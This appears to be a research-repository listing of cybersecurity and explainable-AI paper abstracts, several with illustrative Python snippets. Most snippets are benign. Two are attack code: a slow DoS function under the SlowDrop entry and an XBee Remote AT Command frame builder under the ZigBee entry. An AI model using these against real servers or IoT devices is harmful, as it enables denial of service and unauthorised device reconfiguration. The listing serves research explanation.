30 research outputs found

    Scamming the Scammers: Using ChatGPT to Reply Mails for Wasting Time and Resources

    Full text link
    The use of Artificial Intelligence (AI) to support cybersecurity operations is now a consolidated practice, e.g., to detect malicious code or configure traffic filtering policies. The recent surge of generative AI techniques and frameworks with efficient natural language processing capabilities dramatically magnifies the number of possible applications for increasing the security of the Internet. Specifically, the ability of ChatGPT to produce text while mimicking realistic human interactions can be used to mitigate the plague of scam emails. This paper therefore investigates the use of AI to engage scammers in automated, pointless exchanges, with the goal of wasting both their time and resources. Preliminary results show that ChatGPT is able to decoy scammers, confirming that AI is an effective tool to counteract threats delivered via email. In addition, we highlight the multitude of implications and open research questions to be addressed in view of the ubiquitous adoption of AI.
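    As a rough illustration of the idea, the sketch below wires an LLM into an auto-reply loop. It assumes the OpenAI chat-completions Python client; the model name, persona prompt, and sample email are illustrative choices, not details taken from the paper.

```python
# Hedged sketch of an automated scam-baiting responder (not the paper's code).
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Illustrative persona: verbose, curious, never shares real data.
PERSONA = (
    "You are a gullible but extremely verbose email user. Reply to the "
    "scammer, ask many irrelevant questions, and never reveal personal "
    "or financial information."
)

def draft_reply(scam_email: str) -> str:
    """Generate a time-wasting reply to one incoming scam email."""
    response = client.chat.completions.create(
        model="gpt-4o-mini",  # assumption: any chat-capable model would do
        messages=[
            {"role": "system", "content": PERSONA},
            {"role": "user", "content": scam_email},
        ],
    )
    return response.choices[0].message.content

if __name__ == "__main__":
    print(draft_reply("Dear friend, I am a prince and I urgently need your help..."))
```

    In a full pipeline, the reply would be sent from a disposable mailbox and the loop repeated on each incoming message, so every exchange costs the scammer time.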

    Introducing the SlowDrop Attack

    Get PDF
    In network security, Denial of Service (DoS) attacks target network systems with the aim of making them unreachable. Last-generation threats are particularly dangerous because they can be carried out with very low resource consumption by the attacker. In this paper we propose SlowDrop, an attack characterized by legitimate-like behavior and able to target different protocols and server systems. The proposed attack is the first slow DoS threat targeting Microsoft IIS, until now unexploited by similar attacks. We describe the attack in detail, analyze its ability to target arbitrary systems in different scenarios, including both wired and wireless connections, and compare it to similar threats. The obtained results show that, by executing targeted attacks, SlowDrop is successful both against conventional servers and against Microsoft IIS, which is closed source and required us to perform so-called “network level reverse engineering”. Given its ability to successfully target different servers in different scenarios, the attack should be considered an important achievement in the slow DoS field.
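    SlowDrop's exact packet-level behavior is defined in the paper; the sketch below only illustrates the general slow DoS principle it builds on, namely a connection that looks legitimate when opened but delivers its request one byte at a time. Host, port, and timing are placeholders, and the snippet is meant only for instrumented lab machines you own.

```python
# Hedged sketch of the generic slow DoS principle (NOT the SlowDrop tool):
# open a legitimate-looking connection, then drip the request byte by byte
# so a server worker stays busy for minutes instead of milliseconds.
import socket
import time

def slow_request(host: str, port: int = 80, delay: float = 5.0) -> None:
    request = f"GET / HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()
    with socket.create_connection((host, port)) as sock:
        for byte in request:
            sock.send(bytes([byte]))  # one byte per send call
            time.sleep(delay)         # keep the connection alive but slow

# e.g. slow_request("test-server.lab") against a test server in your lab
```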

    Remotely Exploiting AT Command Attacks on ZigBee Networks

    Get PDF
    Internet of Things (IoT) networks are an emerging phenomenon bringing connectivity to common sensors. Due to the limited capabilities and the sensitive nature of the devices, security assumes a crucial and primary role. In this paper, we report an innovative and extremely dangerous threat targeting IoT networks. The attack exploits Remote AT Commands, giving a malicious user the ability to reconfigure or disconnect IoT sensors from the network. We present the attack and evaluate its efficiency by executing tests on a real IoT network. Results demonstrate that the threat can be successfully executed and that it affects only the targeted nodes, without disturbing the other nodes of the network.
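    To make the mechanism concrete, the following sketch builds the kind of packet such an attack relies on: an XBee API frame carrying a Remote AT Command Request (frame type 0x17). The destination address and the chosen command are hypothetical placeholders; the paper's actual attack procedure may differ.

```python
# Hedged sketch: build an XBee API frame for a Remote AT Command Request
# (frame type 0x17), the packet class that lets one node reconfigure
# another over the air when no link-layer security is enabled.
def remote_at_frame(dest64: bytes, at_cmd: bytes, param: bytes = b"",
                    frame_id: int = 1, options: int = 0x02) -> bytes:
    assert len(dest64) == 8 and len(at_cmd) == 2
    data = (bytes([0x17, frame_id]) + dest64 + b"\xff\xfe"  # 16-bit addr unknown
            + bytes([options]) + at_cmd + param)
    checksum = 0xFF - (sum(data) & 0xFF)
    return b"\x7e" + len(data).to_bytes(2, "big") + data + bytes([checksum])

# Hypothetical example: force pin D0 of a remote node into a fixed state.
frame = remote_at_frame(bytes.fromhex("0013A20012345678"), b"D0", b"\x04")
print(frame.hex())
```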

    Rule-based Out-Of-Distribution Detection

    Full text link
    Out-of-distribution detection is one of the most critical issues in the deployment of machine learning. The data analyst must ensure that data in operation is compliant with the training phase, and must understand whether the environment has changed in a way that makes autonomous decisions unsafe. The method of this paper is based on eXplainable Artificial Intelligence (XAI); it takes into account different metrics to identify any resemblance between in-distribution and out-of-distribution data, as seen by the XAI model. The approach is non-parametric and free of distributional assumptions. Validation over complex scenarios (predictive maintenance, vehicle platooning, covert channels in cybersecurity) corroborates both the precision of detection and the evaluation of how close training and operating conditions are. Results are available via open source and open data at the following link: https://github.com/giacomo97cnr/Rule-based-ODD
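    A minimal sketch in the spirit of the method (the full implementation is at the repository above): treat the leaves of a decision tree as rules and compare how often training data and operational data activate each rule. The synthetic data and the total variation distance are illustrative choices.

```python
# Hedged sketch of rule-based OOD monitoring: compare rule (leaf) activation
# frequencies between training data and data seen in operation.
import numpy as np
from sklearn.tree import DecisionTreeClassifier

def leaf_histogram(tree, X, n_nodes):
    leaves = tree.apply(X)  # index of the rule (leaf) each sample falls into
    hist = np.bincount(leaves, minlength=n_nodes).astype(float)
    return hist / hist.sum()

def ood_score(tree, X_train, X_oper):
    n = tree.tree_.node_count
    p, q = leaf_histogram(tree, X_train, n), leaf_histogram(tree, X_oper, n)
    return 0.5 * np.abs(p - q).sum()  # total variation distance in [0, 1]

rng = np.random.default_rng(0)
X_tr = rng.normal(size=(500, 4))
y_tr = (X_tr[:, 0] > 0).astype(int)
tree = DecisionTreeClassifier(max_depth=4).fit(X_tr, y_tr)

print(ood_score(tree, X_tr, rng.normal(size=(200, 4))))           # in-distribution
print(ood_score(tree, X_tr, rng.normal(loc=3.0, size=(200, 4))))  # drifted
```

    A score near 0 means the rules fire as they did during training; a score near 1 signals that operating conditions have drifted.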

    On the Intersection of Explainable and Reliable AI for physical fatigue prediction

    Get PDF
    In the era of Industry 4.0, the use of Artificial Intelligence (AI) is widespread in occupational settings. Since human safety is at stake, the explainability and trustworthiness of AI are even more important than high accuracy. In this paper, eXplainable AI (XAI) is investigated to detect physical fatigue during a simulated manual material handling task. Besides comparing global rule-based XAI models (Logic Learning Machine (LLM) and Decision Tree (DT)) to black-box models (NN, SVM, XGBoost) in terms of performance, we also compare global models with local ones (LIME over XGBoost). Surprisingly, the global and local approaches reach similar conclusions in terms of feature importance. Moreover, an expansion from local rules to global rules is designed for Anchors through an appropriate optimization method (Anchors coverage is enlarged from an originally low 11% up to 43%). As far as trustworthiness is concerned, rule sensitivity analysis drives the identification of optimized regions in the feature space where physical fatigue is predicted with zero statistical error. The discovery of such “non-fatigue regions” helps certify organizational and clinical decision making.
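    For the local side of the comparison, a minimal sketch of LIME over XGBoost follows; the synthetic data and the feature names are stand-ins for the real fatigue dataset.

```python
# Hedged sketch: local feature importance via LIME over an XGBoost model.
import numpy as np
from xgboost import XGBClassifier
from lime.lime_tabular import LimeTabularExplainer

rng = np.random.default_rng(0)
X = rng.normal(size=(400, 3))
y = (X[:, 0] + 0.5 * X[:, 1] > 0).astype(int)  # toy "fatigue" label

model = XGBClassifier(n_estimators=50, max_depth=3).fit(X, y)

explainer = LimeTabularExplainer(
    X,
    feature_names=["heart_rate", "lift_load", "posture"],  # illustrative names
    class_names=["no fatigue", "fatigue"],
    mode="classification",
)

# Explain one operating condition; the weights can be compared against the
# feature rankings produced by the global rule-based models.
exp = explainer.explain_instance(X[0], model.predict_proba, num_features=3)
print(exp.as_list())  # [(condition, weight), ...]
```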

    eXplainable and Reliable Against Adversarial Machine Learning in Data Analytics

    Get PDF
    Machine learning (ML) algorithms are nowadays widely adopted in different contexts to perform autonomous decisions and predictions. With the high volume of data shared in recent years, ML algorithms have become more accurate and reliable, since the training and testing phases rely on more data. An important concern when deploying ML algorithms is adversarial machine learning, i.e., attacks that craft manipulated data to mislead the algorithm's decisions. In this work, we propose new approaches able to detect and mitigate adversarial machine learning attacks against an ML system. In particular, we investigate the Carlini-Wagner (CW), Fast Gradient Sign Method (FGSM), and Jacobian-based Saliency Map (JSMA) attacks. The aim of this work is to exploit detection algorithms as countermeasures to these attacks. Initially, we performed tests using canonical ML algorithms with hyperparameter optimization to improve metrics. Then, we adopted original reliable AI algorithms, based either on eXplainable AI (Logic Learning Machine) or on Support Vector Data Description (SVDD). The obtained results show how classical algorithms may fail to identify an adversarial attack, while the reliable AI methodologies are more likely to correctly detect a possible adversarial machine learning attack. The proposed methodology was evaluated in terms of a good balance between false positive rate (FPR) and false negative rate (FNR) on real-world application datasets: Domain Name System (DNS) tunneling, vehicle platooning, and Remaining Useful Life (RUL). In addition, a statistical analysis was performed to improve the robustness of the trained models, including an evaluation of their runtime and memory consumption.
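    As a rough illustration of the detection side, the sketch below trains a one-class model on clean data only and flags inputs that fall outside its support. scikit-learn's OneClassSVM (closely related to SVDD for an RBF kernel) stands in for the paper's SVDD, and random perturbations stand in for real CW/FGSM/JSMA samples.

```python
# Hedged sketch: one-class detection of manipulated inputs, trained on
# clean data only. OneClassSVM is a stand-in for the paper's SVDD.
import numpy as np
from sklearn.svm import OneClassSVM

rng = np.random.default_rng(0)
X_clean = rng.normal(size=(500, 8))                         # clean features
X_adv = X_clean[:50] + rng.normal(scale=0.8, size=(50, 8))  # stand-in "attack"

detector = OneClassSVM(kernel="rbf", nu=0.05, gamma="scale").fit(X_clean)

# predict(): +1 = consistent with training data, -1 = potential attack
print("flagged on clean:", (detector.predict(X_clean) == -1).mean())
print("flagged on perturbed:", (detector.predict(X_adv) == -1).mean())
```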

    From Explainable to Reliable Artificial Intelligence

    Get PDF
    Artificial Intelligence systems today interact less and less with humans, leading to fully autonomous decision-making processes. In this context, erroneous predictions can have severe consequences. As a solution, we design and develop a set of methods derived from eXplainable AI models. The aim is to define “safety regions” in the feature space where the rate of false negatives (e.g., in a mobility scenario, predicting no collision when a collision actually occurs) tends to zero. We test and compare the proposed algorithms on two different datasets (physical fatigue and vehicle platooning) and reach quite different conclusions, with results that depend strongly on the level of noise in the dataset rather than on the algorithms at hand.
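    A one-dimensional caricature of the idea: on held-out data, pick the largest score threshold below which no positive case was observed, so the region under it has zero false negatives on that set. The paper's actual safety regions are carved in the multidimensional feature space by XAI-derived rules; the sketch only conveys the zero-false-negative objective.

```python
# Hedged sketch of the zero-false-negative "safety region" objective,
# reduced to a single score threshold on held-out data.
import numpy as np

def safety_threshold(scores: np.ndarray, y_true: np.ndarray) -> float:
    """Largest t such that the region score < t contains no observed positive."""
    return scores[y_true == 1].min()

rng = np.random.default_rng(0)
scores = rng.uniform(size=1000)                                    # predicted risk
y = (scores + rng.normal(scale=0.1, size=1000) > 0.7).astype(int)  # noisy labels

t = safety_threshold(scores, y)
print(f"safety region: score < {t:.3f} (zero false negatives on this set)")
```

    Samples scoring inside the region can be handled autonomously; anything outside it is escalated to a human or a fallback controller.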

    The Future of Cybersecurity in Italy: Strategic Focus Areas

    Get PDF

    Il Futuro della Cybersecurity in Italia: Ambiti Progettuali Strategici (in English: The Future of Cybersecurity in Italy: Strategic Focus Areas)

    Get PDF